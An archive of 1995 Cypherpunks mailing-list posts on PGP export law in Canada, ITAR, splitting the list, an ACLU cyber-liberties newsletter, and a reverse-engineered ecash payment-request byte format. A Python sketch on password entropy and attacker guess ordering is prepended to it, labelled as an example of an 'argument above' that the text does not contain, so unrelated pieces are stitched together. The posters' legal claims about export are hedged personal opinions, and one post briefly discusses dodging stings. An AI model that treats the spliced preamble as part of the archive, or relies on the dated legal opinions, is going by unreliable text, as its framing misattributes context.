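Added example (not part of the original message): the argument above worked through numerically, with surprisal taken from how often a password is chosen rather than from the characters it contains. The counts in OBSERVED are constructed sample data, and the function names and the uniform fallback for never-seen passwords are assumptions of this sketch.

```python
import math
from collections import Counter

PRINTABLE = 94  # printable ASCII characters, excluding space

# Constructed sample: how many accounts chose each password.
OBSERVED = Counter({
    "password": 50, "foofoo": 12, "john": 9,
    "anna": 5, "foobar": 3, "xavier": 1,
})

def uniform_bits(length: int, alphabet: int = PRINTABLE) -> float:
    """Bits of entropy when every string of this length is equally likely."""
    return length * math.log2(alphabet)

def is_doubled(pw: str) -> bool:
    """True for strings of the form XX, such as "foofoo"."""
    half, rem = divmod(len(pw), 2)
    return rem == 0 and half > 0 and pw[:half] == pw[half:]

def bits_after_banning_doubled(length: int, alphabet: int) -> float:
    """Entropy of a uniform choice once all doubled strings are forbidden."""
    total = alphabet ** length
    banned = alphabet ** (length // 2) if length % 2 == 0 else 0
    return math.log2(total - banned)

def surprisal_bits(pw: str, observed: Counter = OBSERVED,
                   alphabet: int = PRINTABLE) -> float:
    """-log2 of the observed frequency of pw. A password never observed gets
    the uniform estimate, which depends on its length only, not on which
    characters it repeats (a fallback estimate, not a normalised model)."""
    if pw in observed:
        return -math.log2(observed[pw] / sum(observed.values()))
    return uniform_bits(len(pw), alphabet)

def guess_order(observed: Counter = OBSERVED) -> list:
    """Order in which an attacker who knows the frequencies would guess."""
    return [pw for pw, _ in
            sorted(observed.items(), key=lambda kv: (-kv[1], kv[0]))]

def shannon_entropy_bits(observed: Counter = OBSERVED) -> float:
    """Entropy of the whole observed distribution of choices."""
    total = sum(observed.values())
    return -sum(c / total * math.log2(c / total) for c in observed.values())

if __name__ == "__main__":
    for pw in ("foofoo", "foobar", "john", "anna", "xavier"):
        print(f"{pw:8s} {surprisal_bits(pw):6.3f} bits  doubled={is_doubled(pw)}")
    a = "7f#qp)djQ10hB%3t+1?U4SVp5"
    b = "7f#q#)d#Q10h#%#t+1#U4S#p5"
    print("unseen a:", surprisal_bits(a), " unseen b:", surprisal_bits(b))
    print("6 lowercase letters, uniform      :", uniform_bits(6, 26))
    print("same, doubled strings forbidden   :", bits_after_banning_doubled(6, 26))
    print("entropy of the observed choices   :", shannon_entropy_bits())
```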




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Thu, 23 Nov 1995 05:53:42 +0800
To: "Thomas M. Swiss" <tms@tis.com>
Subject: Re: MED_vac
In-Reply-To: <199511152004.PAA05104@ziggy.tis.com>
Message-ID: <199511222108.QAA10547@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


"Thomas M. Swiss" writes:
>     A (possibly stupid) thought: could commercial key escrow help here?
>
>     I very much want hospitals to have fast access to my medical data if
>my broken and bleeding body should come through their door, even if I am
>unconscious and my personal physician cannot be reached. On the other hand,
>I don't want anyone to be snooping through them right now.

Actually, Bell Labs outlines a system which can preserve anonymity
under these circumstances in "The Use of Communications Networks to
Increase Personal Privacy In a Health Insurance Architecture" at
<URL:ftp://ftp.research.att.com/dist/anoncc/privacy.health.ps.Z>.

It's based on their anonymous credit card protocol, which is really a
sort of identity escrow service managed by a remailer.  You might find
it interesting.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@amanda.dorsai.org>
Date: Thu, 23 Nov 1995 05:25:35 +0800
To: Eric Anderson <ericande@cnw.com>
Subject: Re: Visual Basic 4.0 encryption prog.
In-Reply-To: <01BAB5D0.4CBEAEE0@king1-04.cnw.com>
Message-ID: <Pine.SUN.3.91.951122153315.26251W@amanda.dorsai.org>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 18 Nov 1995, Eric Anderson wrote:

> 	I just scored a copy of visual basic 4.0 and I was wondering how feasible it would be to write a program for Window$ 95 that would use RSA or IDEA and the Win95 exchange interface. I plan on buying Applied Cryptography probably on Fri. when I get paid.
> 	My requirements/goals are: 100% compatibility with M$ Exchange, ease of use (Point & Click/ drag & drop) and last but not least, STRONG public key encryption using "off-the-shelf"
> code. 


> 	So my ??? Is this: Is it possible? Or should I just go out and buy a C++ compiler.
> I don't really care about ITAR or any of that other BS, I just won't put MY name on it.

You've already put your name on it by asking this question and providing 
so much detail on what tools you would use and what you want to do. :-)

But there is no reason why this isn't possible in ANY language.  You'll 
just have to write a lot of code by hand, or port to VB... especially the 
large-number routines.

==========================================================================
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. |   _ |>
  \|/  |sunder@dorsai.org| Where day by day, yet another   |   \ |
<--+-->|                 | Constitutional right vanishes.  |    \|
  /|\  |    Just Say     |                                 |    <|\
 + v + | "No" to the NSA!| Jail the censor, not the author!|    <| n
===================http://www.dorsai.org/~sunder/=========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@aw.sgi.com>
Date: Thu, 23 Nov 1995 05:40:00 +0800
To: Still <cypherpunks@toad.com>
Subject: Re: PGP in Canada
In-Reply-To: <Pine.A32.3.91.951122154553.3843A-100000@juliet.stfx.ca>
Message-ID: <9511221544.ZM6977@glacius.alias.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

<fearing the wrath of the cpunks, but deciding that it's better to get this
`sorted out' than keep on being wrong>

Please take all of the following as being my statements of
what I think, not statements of absolute truth. [That is,
call the CEC yourself.]

It is legal for a Canadian citizen to import PGP into Canada
under Canadian law. It is legal to use either the international
or yanqui versions in Canada--software patents don't apply [I
don't think].

It is legal for an American to give pgp to an American citizen,
a permanent legal resident alien of the United States, or to a
Canadian citizen, providing the receiver is in Canada or the
United States.

It is *illegal* for a Canadian to export pgp anywhere except the
U.S., if the pgp came from the U.S. and no substantial changes
have been made to it.

For more docs, see
http://www.io.org/~samwise/crypto/
[yes, I know, it hasn't changed in a while, and there's some stuff
missing [such as the Area Control List], but the most important
thing on that web page is the information about who to ask: there's
an office in Halifax]

My recommendation: get the international version of PGP. [Unless, of
course, the above statements are wrong, in which case my reasoning
in favour of the international version is faulty.]

richard

- --
Richard Martin                           I DON'T SPEAK FOR ALIAS|WAVEFRONT
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin@aw.sgi.com/g4frodo@cdf.toronto.edu      http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLOLkh1gtCYLvIJ1AQHkfAQAkz8HnhxC0S59PHCajFQYGjp1dCVNzbf2
JZnv4epN/KSr6K1f/v2fLF9PoCylADHulHze/oeN1T3gEel6MfNQheZTFofu3381
y9O39q4lmRyS6YrL07T9A3hr3taCrx3W9L7HZancKmKQk1EyNHgG+0ECiDR20Lp9
H0AyGkGSmng=
=hN9v
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Thu, 23 Nov 1995 08:18:09 +0800
To: cypherpunks@toad.com
Subject: Re: Spam the Sign!
In-Reply-To: <Pine.SUN.3.91.951122145559.24028D-100000@viper.law.miami.edu>
Message-ID: <199511230002.QAA01527@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


> > >[regarding suggestion that netscape give mit or someone a 128 bit version 
> > >to place on an ftp server]
> > >
> > >This is not an apology for the ITAR, just my usual lawyerly overcaution:
> > >
> > >Suppose A gives B a program that is export controlled, intending for B to 
> > >allow it to be exported.  Has A conspired with B to export the program?
> > >
> > >Let's ask the grand jury investigating Phil....
> > 
> > That's a possible problem, I suppose, but wouldn't you be protected if
> > your license agreement with MIT (or whoever) specified redistribution
> > "for domestic use only"?
> > 
> "protected"? No.  "Helped"? Yes.  The government can argue to the jury 
> that the agreement was a sham and you knew it....

(Great, I'm about to argue law with a REAL LAWYER (tm).  And they promised me
that Cypherpunks wouldn't cause brain damage ... )

OK, suppose A does NOT intend for B to export it, and he does anyway ...

Now suppose that instead of giving it to B, he SELLS it to him ...

So a pirated copy of the commercial version of Netscape's Navigator shows
up in a Hong Kong flea market, and Barksdale goes to jail ...

(Members of the jury, Mr. Barksdale MUST have known that one of his millions
of paying customers would export that dangerous munition ...)

The logical ludicrousness of ITAR shows up fast no matter which angle you
look at it from, and yet the people with the <exonized for your protection>
to actually challenge it aren't the big companies who stand to gain the
most financially, it's a bunch of guys (a lot of whom hang around here
sometimes) who are successfully giving away 'export controlled' software,
while the people with the resources to really fight this thing sit on the
sidelines waiting for Phil Zimmermann or Phil Karn to get them off the hook
so they can go and make a lot of money.

It seems to me that there's something very wrong with this picture, and while
I don't mean this in any way to be taken personally, one of the big things
I see as wrong is overcautious lawyers.

-- 
Jeff Simmons                           jsimmons@goblin.punk.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Still <x93ojg@juliet.stfx.ca>
Date: Thu, 23 Nov 1995 04:44:54 +0800
To: CypherPunks List <cypherpunks@toad.com>
Subject: PGP
Message-ID: <Pine.A32.3.91.951122154553.3843A-100000@juliet.stfx.ca>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know what the laws are regarding the export of PGP into 
Canada?  I know that it is not allowed to be exported overseas but what is 
the ruling on export into Canada.  Some sites say that it can be exported into 
Canada and others say that it can't.  Can anyone out there give me some 
information on this topic?

--

	     T H E  M A N , T H E  M Y T H , T H E  L E G E N D . 
******************************************************************************
* Dylan "Still" Boudreau	* Knowledge is proud that she knows so much; *
* Internet: x93ojg@stfx.ca	* Wisdom is humble that she knows no more.   *
******************************************************************************
*       Homepage: http://juliet.stfx.ca/people/stu/x93ojg/welcome.html       *  
******************************************************************************

		When someone says, "That's a good question." 
		 You can be sure it's a lot better than the 
		         answer you're going to get.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Still <x93ojg@juliet.stfx.ca>
Date: Thu, 23 Nov 1995 04:52:36 +0800
To: cypherpunks@toad.com
Subject: Re: PROPOSAL: cypherpunks-news@toad.com?
In-Reply-To: <9510228170.AA817074264@cc3.dttus.com>
Message-ID: <Pine.A32.3.91.951122161441.3843B-100000@juliet.stfx.ca>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 22 Nov 1995, Martin Diehl wrote:

>      My vote, for what it's worth, is don't split the list.  It won't work 
>      because the extra posts ARE going to go to this list because that's 
>      where they believe their readers are.
>      

I have got to agree with Martin.  If you split the group a lot of us are
going to subscribe to both groups so when people submit this stuff and
cross post it we are going to get two copies of the same message.  I 
think I can speak for most people when I say that I don't need that extra 
mail volume.


--

	     T H E  M A N , T H E  M Y T H , T H E  L E G E N D . 
******************************************************************************
* Dylan "Still" Boudreau	* Knowledge is proud that she knows so much; *
* Internet: x93ojg@stfx.ca	* Wisdom is humble that she knows no more.   *
******************************************************************************
*       Homepage: http://juliet.stfx.ca/people/stu/x93ojg/welcome.html       *  
******************************************************************************

		When someone says, "That's a good question." 
		 You can be sure it's a lot better than the 
		         answer you're going to get.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Yih-Chun Hu <yihchun@u.washington.edu>
Date: Thu, 23 Nov 1995 08:46:54 +0800
To: blancw@accessone.com
Subject: Re: Q: Bookshop in Seattle
In-Reply-To: <9511112134.AA29395@pulm1.accessone.com>
Message-ID: <Pine.OSF.3.91l.951122161727.10225A-100000@saul2.u.washington.edu>
MIME-Version: 1.0
Content-Type: text/plain



This may be a bit late...
I just picked it up from UBS for $49.95. It's ordered at B&N for $39.95
I think.

On Sat, 11 Nov 1995 blancw@accessone.com wrote:

> 
>   Can someone point me towards a bookshop in Seattle that is likely to
> have the second edition of Applied Cryptography?
> .......................................
> 
>  Tower Books (I've seen it advertised there)
>  The University BookStore (probably)
>  Barnes & Noble (potentially)
> 
> 
>   ..
> Blanc
> 
> 
> 

+---- Yih-Chun Hu (finger:yihchun@cs.washington.edu) ----------------------+
| http://www.cs.washington.edu/homes/yihchun     yihchun@cs.washington.edu |
| http://weber.u.washington.edu/~yihchun         yihchun@u.washington.edu  |
+---- PGP Key Fingerprints (Keys by FINGER or on WWW) ---------------------+
| 1024/E50EC641        B2 A0 DE 9E 36 C0 EB A6  F9 3E D2 DD 2F 27 74 79    |
| 2047/DF0403F9        18 EB 62 C8 7F 06 04 67  42 76 24 E2 99 D1 07 DC    |
+--------------------------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 23 Nov 1995 09:24:23 +0800
To: cypherpunks@toad.com
Subject: Re: ecash protocol: Part 1
In-Reply-To: <199511212146.NAA11456@cory.EECS.Berkeley.EDU>
Message-ID: <199511230103.RAA15911@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Ian Goldberg <iang@cory.EECS.Berkeley.EDU> writes:

>Last week, I was taking a look at the ecash protocol (no, I don't have a copy;
>I have a binary, which I can't even run...).  

>I've managed to decipher a useful bit of the first message sent from
>the shop to the payer.  It's the Payment Request, and contains the following
>information:

>o Header identifying packet as Payment Request
>o The integer 4
>o The payment amount, in cents
>o The time (seconds since 1970)
>o The integer 79
>o The name of the shop (payee)
>o A description of the item being paid for
>o An empty string
>o The integer 0
>o End of Record marker

That's very interesting work!  What are the string formats, are they null
terminated or Pascal-style with a preceding count byte?  How did you
identify "an empty string", wouldn't that just be a byte of 0?  How did
you know it was an empty string rather than just a 0?

Did you get this by inducing a shop to send a payment request message to
some program you wrote which was listening on the ecash port?

I think a good way to get the rest of the information would be with a
proxy which logged message traffic.  I know ecash has some proxy support
but I'm not sure how it works.  There are SOCKS proxies and http proxies,
and I don't know which it uses.  I used a logging httpd proxy to derive
the data for the SSL challenges I did this past summer.  It might be
interesting to post the binary data from some ecash transactions.

>I guess the important bit is that the payee, the item being bought,
>and the cost are sent _in the clear_.  Some of the people I've talked
>to think this is a huge privacy breach, and some don't.  You all can
>debate this now.  Lucky can, if he wishes, add insight, and/or tell us
>what DC may do about this.

I wonder if it would be legal to write shop software which sent such a
payment request, took the resulting coins, and deposited them in the bank
(if we could figure out all the protocols necessary).  This particular
sequence of operations would not appear to infringe anybody's patents -
there are no blinding operations involved.  It's not clear how useful
such a program would be but at least it would be one step away from the
DigiCash monopoly.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karlton <karlton@netscape.com>
Date: Thu, 23 Nov 1995 09:53:38 +0800
To: cypherpunks@toad.com
Subject: Re: Java & Netscape security [NOISE]
In-Reply-To: <199511221048.CAA26409@jobe.shell.portal.com>
Message-ID: <30B3CE64.6BF2@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Alice (or someone representing themselves as Alice) said:

> What I'm trying to say is that if someone posts from watson.ibm.com,
> and IF they are talking about OS/2, we will not accept that they are
> not speaking independently of the knowledge they have garnered from
> watson.

And that is understandable.

> In the same way, someone who writes from Netscape.com or AT&T, or Sun
> and tries to disclaim that they are speaking for the company, when
> they step out as an employee of a company is deluding themselves.

This is a complete non sequitur. See if you can follow this: only those
authorized by the company to speak for the company are authorized to speak
for the company.

There is a genuine difference between a corporate officer saying

	The Amalgamated Widget corporate policy on strong crypto is ...

and some engineer from Amalgamated Widget saying

	My private opinion on strong crypto is ...

The consequence of every statement by every employee being taken as
company policy is that every employee (except for public relations) will
be prohibited from contributing to any public forum or even answering
apparently innocuous questions on the net. This would not be a desirable
outcome.

Still speaking for myself,
PK
--
Philip L. Karlton		karlton@netscape.com
Principal Curmudgeon		http://www.netscape.com/people/karlton
Netscape Communications




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: A.Back@exeter.ac.uk
Date: Thu, 23 Nov 1995 02:19:53 +0800
To: perry@piermont.com
Subject: PROPOSAL: cypherpunks-news@toad.com? (was: rand-test)
In-Reply-To: <199511221609.LAA21172@jekyll.piermont.com>
Message-ID: <5579.199511221742@olib>
MIME-Version: 1.0
Content-Type: text/plain



Perry Metzger <perry@piermont.com> writes:
> "James M. Cobb" writes:
> > Friend, 
> >  
> >  
> > The following information from 
> 
> 1) You are not my friend.
> 
> 2) My private mail to you hasn't convinced you to stop this barrage of
>    reposts. Would you please do so?

I am inclined to agree with Perry in as much as the volume of posts to
the cypherpunks list is greatly increased by reposts of news from
other mailing lists, USENET newsgroups, WWW sources, newspapers, TV
programs, films, books, talks, etc.  While some of the information
posted is interesting, and relevant, some others are less relevant,
bordering on noise.

It is much more efficient of list bandwidth to post short pointers
only, of the style John Young <jya@pipeline.com> posts.  Or an
alternative I have been thinking might be useful: a separate list.

The proposal: a separate list for current-event reports/news/reposts.

I think it would be useful if a separate mailing list were set up on
toad.com, called say "cypherpunks-news@toad.com" (or whatever) to
distinguish it from the main cypherpunks list.

That way people who aren't interested to read reposts just don't
subscribe to cypherpunks-news, and those who want to catch up on
cypherpunks related current events, media reports etc, can browse
through the archives for cypherpunks-news.

What do others think?

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ACLUNATL@aol.com
Date: Thu, 23 Nov 1995 09:34:39 +0800
To: beeson@aclu.org
Subject: ACLU Cyber-Liberties Update -- 11/22/95
Message-ID: <951122180144_114185619@mail06.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


----------------------------------------------------------------
November 22, 1995
ACLU CYBER-LIBERTIES UPDATE
A bi-weekly e-zine on cyber-liberties cases and controversies
at the state and federal level.
----------------------------------------------------------------
IN THIS ISSUE:

*     New York Civil Liberties Union Opposes Discipline of Cornell Students
for Offensive Online Speech

*     Seattle Negotiates New Franchise Agreement with Cable Network to Offer
Internet Access; ACLU of Washington Gives Testimony on Privacy Implications

*     Watch Out for Cyber-Liberties Infringements in Counter-Terrorism
Legislation; House May Consider Bill in Early December

*     Update and ACTION ALERT on Federal Online Indecency Legislation

*     Online Discussion Groups on Electronic Access Issues

----------------------------------------------------------------
STATE PAGE (Legislation/Agency/Court Cases)
----------------------------------------------------------------
* New York Civil Liberties Union Opposes Discipline of Cornell Students for
Offensive Online Speech

The latest controversy over appropriate use of the Internet at universities
erupted last week after four Cornell students made a list of "75 reasons why
women should not have freedom of speech" and the list got loose on the
Internet.  Responding to e-mail and phone complaints about the message,
Cornell considered disciplinary action against the students.

The NYCLU wrote a letter to Cornell on Thursday, November 16th, urging
Cornell not to proceed with disciplinary action.  The letter said, "Freedom
of expression, especially in the academic forum, is designed to encourage
truth-seeking by protecting the challenge and response of intellectual
discourse. . . .  It is understandable that university officials should be
concerned about the increase in the use of sexist language. . . .  However,
no matter how troubling or offensive the message is, the administration of
Cornell University should not depart from principles of freedom of expression
when addressing the issues surrounding this dispute."  The letter went on to
note that "the marketplace theory of free expression appears to be in full
swing as the wrong-minded e-mail message has apparently already provoked
'thousands of angry messages' both to Cornell and to the particular four
students."

On Thursday afternoon, Cornell announced that it would not pursue any
disciplinary action against the students.

For a copy of the letter that NYCLU sent to Cornell, send a message to
infoaclu@aclu.org with "NYCLU Letter to Cornell" in the subject line.  For
more information, contact Beth Haroules, Staff Attorney, NYCLU, at
212-382-0557.

----------------------------------------------------------------
*     Seattle Negotiates New Franchise Agreement with Cable Network to Offer
Internet Access; ACLU of Washington Testifies at Hearing on Privacy
Implications

Cities across the country are beginning to renegotiate franchise agreements
with cable networks who want to get into the Internet access business.  Civil
libertarians must work to ensure that strong privacy protections are included
in these agreements.

The City of Seattle is currently negotiating a new franchise agreement with
TCI of Seattle, Inc., and the ACLU of Washington urged the city to include
provisions to protect consumer privacy.  In a letter dated November 9th,
ACLU-W said that "franchisees should be prohibited from collecting any data
on individual use of the cable network, including Internet access, except
that data minimally needed for billing purposes. . . .  [T]he franchisee
should be precluded from collecting information about which other Internet
sites are accessed through the cable network, which newsgroups are read,
which real-time interactive forums are participated in, or any other
information that could be used to compile a data profile of the subscriber."
 The letter also urged the city to require technological protections, like
encryption, to guard against unauthorized tapping.

For a copy of the letter, send a message to infoaclu@aclu.org with "cable
franchise agreement" in the subject line.  For more information, contact Doug
Klunder, ACLU-W Information Technology Committee, dougk@eskimo.com.

----------------------------------------------------------------
FEDERAL PAGE (Congress/Agency/Court Cases)
----------------------------------------------------------------
*     Watch Out for Cyber-Liberties Infringements in Counter-Terrorism
Legislation; House May Consider Bill in Early December

The House of Representatives is scheduled to debate a broad counter-terrorism
bill in early December.  (The Senate passed a similar bill in June 1995.)
 While the counter-terrorism bill contains many unconstitutional provisions,
the net community should be particularly alert to the following:

1.  The pending House counter-terrorism bill contains a funding mechanism for
vastly expanded wiretap capabilities for federal law enforcement (authorized
by the Digital Telephony law passed by Congress last year). The FBI's scheme
would give government an unprecedented ability to intrude on privacy through
increased wiretaps.  The net community should oppose this and any other
funding scheme for the FBI's wiretap proposal.  (See our 11/8 issue of the
Cyber-Liberties Update for an ACLU statement and action alert on the federal
wiretap proposal.)

2.  The version of counter-terrorism legislation already passed by the Senate
contains a revised Feinstein Amendment, which makes it a felony "to
distribute by any means information pertaining to, in whole or in part, the
manufacture of explosive materials, if the person intends, or knows that such
explosive materials or information will likely be used for" criminal
purposes.  While the legislation applies to all media, it grew out of Senator
Feinstein's vilification of the Internet at the Senate's May 11th
counter-terrorism  hearings.  The House version of counter-terrorism
legislation does not currently contain language like the Feinstein Amendment,
but the online community should stand ready to oppose any effort to include
such unconstitutional provisions in the final House bill.

For a copy of the ACLU's letter to the Senate in opposition to the original
Feinstein Amendment, send a message to infoaclu@aclu.org with "Feinstein
Amendment" in the subject line.

For further information on the ACLU's opposition to counter-terrorism
legislation (which would also expand the FBI's powers in electronic
surveillance and other areas), visit the ACLU's Constitution Hall on America
Online, at keyword ACLU.

----------------------------------------------------------------
*     Update and ACTION ALERT on Federal Online Indecency Legislation

The Conference Committee on the telecommunications bill is currently
considering whether to remove provisions that would make "indecency" and
other speech a crime in cyberspace.  The Christian Coalition and other
anti-free-speech groups continue to heavily lobby the Conferees to make the
new speech crimes even stricter than the Exon Amendment.  To counter this
backlash, the online community must overwhelm the Conference Committee with a
loud and clear message -- that parental empowerment tools and not big
government censorship are the only effective means to address children's
access to online content.

While the Conference Committee is home for Thanksgiving, we urge you to call
the Conferees in your state.  To find a list of the home office phone numbers
for the Conferees, see the current ACTION ALERT at http://www.vtw.org/

The ACLU continues to prepare for a constitutional challenge to the online
censorship provisions if they become law.  Please contact Ann Beeson,
beeson@aclu.org, if your organization is interested in being a plaintiff in
this ground-breaking litigation that will define First Amendment rights in
cyberspace.

----------------------------------------------------------------
Online Discussion Groups on Electronic Access Issues
----------------------------------------------------------------
The following discussion groups are actively debating government information
and access issues:

GOVPUB -- issues related to publishing local and state government information
online
Subscribe: listserv@vm1.nodak.edu
Message: subscribe govpub

GOVACCESS -- citizen access to government information
Subscribe: majordomo@well.dom
Message: subscribe govaccess

PUBPOL-D -- substantive discussion of public policy issues
Subscribe: listserv@vm1.spcs.umn.edu
Message: subscribe pubpol-d [your name]

COMMUNET -- issues related to community and civic networks
Subscribe: listserv@uvmvm.uvm.edu
Message: subscribe communet [your name]

----------------------------------------------------------------
ONLINE RESOURCES FROM THE ACLU NATIONAL OFFICE
----------------------------------------------------------------
Stay tuned for news on the ACLU's world wide web site, under construction at
http://www.aclu.org.  America Online users should check out our live chats,
auditorium events, *very* active message boards, and complete news on civil
liberties, at keyword ACLU.

----------------------------------------------------------------
ACLU Cyber-Liberties Update
Editor: Ann Beeson (beeson@aclu.org)
American Civil Liberties Union National Office
132 West 43rd Street
New York, New York 10036

To subscribe to the ACLU Cyber-Liberties Update, send a message to
infoaclu@aclu.org with "subscribe Cyber-Liberties Update" in the subject line
of your message.  To terminate your subscription, send a message to
infoaclu@aclu.org with "unsubscribe Cyber-Liberties Update" in the subject
line.

For general information about the ACLU, write to infoaclu@aclu.org.
----------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 24 Nov 1995 18:19:05 +0800
To: Jeff Simmons <cypherpunks@toad.com
Subject: Re: Spam the Sign!
Message-ID: <199511240423.UAA25467@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 04:02 PM 11/22/95 -0800, Jeff Simmons wrote:

> and yet the people with the [balls]
> to actually challenge it aren't the big companies who stand to gain the
> most financially, it's a bunch of guys (a lot of whom hang around here
> sometimes) who are successfully giving away 'export controlled' software,

If you have looked at court cases recently, you will notice 
that most juries will find a corporation guilty of anything, 
no matter how absurd.  At a gut level they feel that the 
pursuit of profit is itself a crime, and that the pursuit 
of profit in an organized group is a flagrant and terrible 
crime, deserving of the most savage punishment, unless that 
pursuit has been thoroughly and carefully supervised and 
authorized by the state.


They are much more reluctant to punish an individual, which is why
the government wants to keep Phil in permanent legal limbo.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 24 Nov 1995 18:17:51 +0800
To: Jay Campbell <cme@clark.net>
Subject: Re: crypto for porno users
Message-ID: <199511240423.UAA25472@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:17 AM 11/23/95 -0800, Jay Campbell wrote:
> A common way to get around prostitution sting operations 
> is to ask the lady to expose sensitive portions of her anatomy 
> to prove her sincerity before the would-be customer commits 
> to any transactions; this sort of thing is also becoming 
> commonplace on the net for pornography or pirated software,

This protects the customer against stings, but it does not
protect the supplier against stings.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Thu, 23 Nov 1995 09:54:58 +0800
To: Richard Martin <rmartin@aw.sgi.com>
Subject: Re: PGP in Canada
In-Reply-To: <9511221544.ZM6977@glacius.alias.com>
Message-ID: <Pine.3.89.9511222044.B25201-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 22 Nov 1995, Richard Martin wrote:

> It is legal for a Canadian citizen to import PGP into Canada
> under Canadian law. It is legal to use either the international
> or yanqui versions in Canada--software patents don't apply [I
> don't think].
Yup. RSA's only patented in one country- the USA. Though maybe with NAFTA...?

> It is *illegal* for a Canadian to export pgp anywhere except the
> U.S., if the pgp came from the U.S. and no substantial changes
> have been made to it.

All the same if it was freeware crypto software and completely written 
outside the US, I'm under the understanding that you can export without a 
license. IANAL, I may be wrong. Do double check.

Do mail the export controls division of external affairs and
ask for "Canada's Export Controls", the "General Software Note" and
a specific opinion regarding the exportability of pgp, US crypto,
non-US crypto and freeware vs. commercial wares. They also hadn't
made up their mind as to whether ftp constituted export.

They have branches in all major Canadian cities, so I'll mail the nearest
addresses to those who are interested (I'm not at home right now).

> My recommendation: get the international version of PGP. [Unless, of
> course, the above statements are wrong, in which case my reasoning
> in favour of the international version are faulty.]

Sorry to say, it would be pointless, you wouldn't be able to export it from
here unless it was totally rewritten outside the US (which I take it
it isn't, right?)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Thu, 23 Nov 1995 10:23:39 +0800
To: cypherpunks@toad.com
Subject: Re: ecash protocol: Part 1
In-Reply-To: <199511212146.NAA11456@cory.EECS.Berkeley.EDU>
Message-ID: <490jct$11k@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <199511230103.RAA15911@jobe.shell.portal.com>,
Hal  <hfinney@shell.portal.com> wrote:
>Ian Goldberg <iang@cory.EECS.Berkeley.EDU> writes:
>
>>Last week, I was taking a look at the ecash protocol (no, I don't have a copy;
>>I have a binary, which I can't even run...).  
>
>>I've managed to decipher a useful bit of the first message sent from
>>the shop to the payer.  It's the Payment Request, and contains the following
>>information:
>
>>o Header identifying packet as Payment Request
>>o The integer 4
>>o The payment amount, in cents
>>o The time (seconds since 1970)
>>o The integer 79
>>o The name of the shop (payee)
>>o A description of the item being paid for
>>o An empty string
>>o The integer 0
>>o End of Record marker
>
>That's very interesting work!  What are the string formats, are they null
>terminated or Pascal-style with a preceding count byte?  How did you
>identify "an empty string", wouldn't that just be a byte of 0?  How did
>you know it was an empty string rather than just a 0?

See below.

>Did you get this by inducing a shop to send a payment request message to
>some program you wrote which was listening on the ecash port?

Yup.  I just had a program sitting on the ecash port that hexdumped
anything fed to it.  That, and a copy of the binary to read...

>I wonder if it would be legal to write shop software which sent such a
>payment request, took the resulting coins, and deposited them in the bank
>(if we could figure out all the protocols necessary).  This particular
>sequence of operations would not appear to infringe anybody's patents -
>there are no blinding operations involved.  It's not clear how useful
>such a program would be but at least it would be one step away from the
>DigiCash monopoly.

From what I gathered from Doug's posts a little while back, the _client_
stuff is perfectly fine; only the _bank_ stuff is Chaum-patented.

Here are the messy byte-details:

The data encoding:
---
Header:  2 bytes

0xa0 0x80+type

where type is:

0x12: Payment Request
0x0a: Payment
0x29: Length of Message
0x13: Dummy Message
(there are others)
---
EOR: 1 byte

0xa1

End of Record indicator
---
n-byte Integer:

0x90 0x80+n followed by n bytes of data, MSB first

n should probably be 1 <= n <= 4.
---
Date: 4 bytes

0x91 0x84 followed by 4 bytes of time since 1970
---
String:

0x92 0x80+(length) followed by (length) bytes
---
Data:

0x94 0x80+(length) followed by (length) bytes
---
